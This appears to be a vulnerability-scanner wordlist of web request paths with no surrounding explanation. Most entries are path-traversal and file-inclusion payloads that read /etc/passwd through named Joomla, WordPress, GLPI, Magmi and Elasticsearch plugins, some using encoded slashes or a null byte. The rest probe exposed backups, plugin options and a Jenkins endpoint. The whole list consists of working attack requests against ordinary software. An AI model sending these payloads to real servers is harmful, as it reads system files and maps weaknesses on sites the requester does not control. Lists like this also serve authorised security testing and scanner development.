/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/wp-json/acf/v3/options/a?id=active&field=plugins
/wp-content/uploads/wp-file-manager-pro/fm_backup/
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/wp-json/wp/v2/lesson/1
